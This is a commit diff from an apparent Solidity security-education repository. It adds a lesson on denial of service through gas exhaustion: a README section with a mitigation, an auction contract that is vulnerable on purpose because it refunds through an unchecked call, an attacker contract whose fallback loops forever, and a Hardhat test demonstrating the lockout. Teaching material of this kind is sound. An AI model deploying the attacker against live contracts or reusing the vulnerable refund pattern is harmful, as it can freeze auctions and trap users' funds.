add block gas limit dos

Author: andreitoma8

README.md

@@ -12,6 +12,7 @@ Summary:
 -   [Insecure Source of Randomness](#insecure-source-of-randomness)
 -   [Denial of Service](#denial-of-service)
     -   [Reject Ether transfer](#reject-ether-transfer)
+    -   [DoS with Block Gas Limit](#dos-with-block-gas-limit)
 
 # Reentrancy
 
@@ -420,3 +421,20 @@ contract RejectEtherSafe {
     }
 }
 ```
+
+## DoS with Block Gas Limit
+
+Each Ethereum block has a gas limit, which is the maximum amount of gas that can be spent in the block. If a transaction requires more gas than the block gas limit, the transaction will be reverted. This can be used by an attacker to block a contract from being used by sending a transaction that requires more gas than the block gas limit.
+
+It is very similar to the previous DoS vulnerability, but can apply to cases where the succes call to the unknown contract is not required. You'll see in the PoC how the attacker for the previous vulnerability does not work on the vulnerable contract and how the new attacker will work.
+
+### POC
+
+-   Contracts: [BlockGasLimit.sol](contracts/BlockGasLimit.sol)
+-   Test: `yarn test test/blockGasLimit.ts`
+
+In the code of the PoC we can see that we don't have any revert in case the call to the unknown contract fails, so not having a `receive` or `fallback` function will not prevent the contract from being used. However, if the implementation of the `fallback` function is too expensive, like a infinite loop that will run out of gas, the contract will be blocked from being used.
+
+### Solutions:
+
+Same as with the previous DoS vulnerability, try avoiding making calls to unknown contract, but if you have to, implement the `Pull over Push` Smart Contract design pattern.

contracts/BlockGasLimit.sol

@@ -0,0 +1,41 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+// Auction contract that keeps track of the highest bidder and Ether bid.
+// Whoever sends a higher bid becomes the new highest bidder and the old one
+// gets refunded.
+contract BlockGasLimitVulnerable {
+    address public highestBidder;
+    uint256 public highestBid;
+
+    function bid() public payable {
+        // Reject new bids that are lower than the current highest bid.
+        require(msg.value > highestBid, "Bid not high enough");
+
+        // Refund the current highest bidder, if it exists.
+        if (highestBidder != address(0)) {
+            highestBidder.call{value: highestBid}("");
+        }
+
+        // Update the current highest bid.
+        highestBidder = msg.sender;
+        highestBid = msg.value;
+    }
+}
+
+contract BlockGasLimitAttacker {
+    BlockGasLimitVulnerable vulnerable;
+
+    constructor(BlockGasLimitVulnerable _vulnerable) {
+        vulnerable = _vulnerable;
+    }
+
+    function attack() public payable {
+        vulnerable.bid{value: msg.value}();
+    }
+
+    // Fallback function implemented just to run out of gas.
+    fallback() external payable {
+        while (true) {}
+    }
+}

test/blockGasLimit.ts

@@ -0,0 +1,63 @@
+import type { SignerWithAddress } from "@nomiclabs/hardhat-ethers/signers";
+import chai, { expect } from "chai";
+import chaiAsPromised from "chai-as-promised";
+import { ethers } from "hardhat";
+
+import { BlockGasLimitVulnerable, BlockGasLimitAttacker, RejectEtherAttacker } from "../typechain-types";
+
+chai.use(chaiAsPromised);
+
+describe("BlockGasLimit", () => {
+    let deployer: SignerWithAddress;
+    let attacker: SignerWithAddress;
+    let blockGasLimitVulnerable: BlockGasLimitVulnerable;
+    let blockGasLimitAttacker: BlockGasLimitAttacker;
+    let rejectEtherAttacker: RejectEtherAttacker;
+
+    before(async () => {
+        [deployer, attacker] = await ethers.getSigners();
+    });
+
+    beforeEach(async () => {
+        const BlockGasLimitVulnerable = await ethers.getContractFactory("BlockGasLimitVulnerable");
+        blockGasLimitVulnerable = await BlockGasLimitVulnerable.deploy();
+        await blockGasLimitVulnerable.deployed();
+
+        const BlockGasLimitAttacker = await ethers.getContractFactory("BlockGasLimitAttacker");
+        blockGasLimitAttacker = await BlockGasLimitAttacker.deploy(blockGasLimitVulnerable.address);
+        await blockGasLimitAttacker.deployed();
+
+        const RejectEtherAttacker = await ethers.getContractFactory("RejectEtherAttacker");
+        rejectEtherAttacker = await RejectEtherAttacker.deploy(blockGasLimitVulnerable.address);
+        await rejectEtherAttacker.deployed();
+    });
+
+    it("should not be vulnerable to RejectEtherAttacker DoS", async () => {
+        await blockGasLimitVulnerable.bid({ value: ethers.utils.parseEther("1") });
+        console.log("Balance after first bid: ", ethers.utils.formatEther(await ethers.provider.getBalance(blockGasLimitVulnerable.address)));
+
+        console.log("Attacker is attacking...");
+        await rejectEtherAttacker.connect(attacker).attack({ value: ethers.utils.parseEther("2") });
+        console.log("Balance after attack bid: ", ethers.utils.formatEther(await ethers.provider.getBalance(blockGasLimitVulnerable.address)));
+
+        await blockGasLimitVulnerable.bid({ value: ethers.utils.parseEther("3") });
+        expect(await blockGasLimitVulnerable.highestBid()).to.equal(ethers.utils.parseEther("3"));
+        expect(await blockGasLimitVulnerable.highestBidder()).to.equal(deployer.address);
+
+        console.log("Balance after third bid: ", ethers.utils.formatEther(await ethers.provider.getBalance(blockGasLimitVulnerable.address)));
+    });
+
+    it("should be vulnerable to BlockGasLimitAttacker DoS", async () => {
+        await blockGasLimitVulnerable.bid({ value: ethers.utils.parseEther("1") });
+
+        console.log("Attacker is attacking...");
+        await blockGasLimitAttacker.connect(attacker).attack({ value: ethers.utils.parseEther("2") });
+
+        try {
+            await blockGasLimitVulnerable.bid({ value: ethers.utils.parseEther("3"), gasLimit: 100000 });
+        } catch (error: any) {
+            console.log("...");
+            console.log("Bid transaction reverted with reason: ", error.message);
+        }
+    });
+});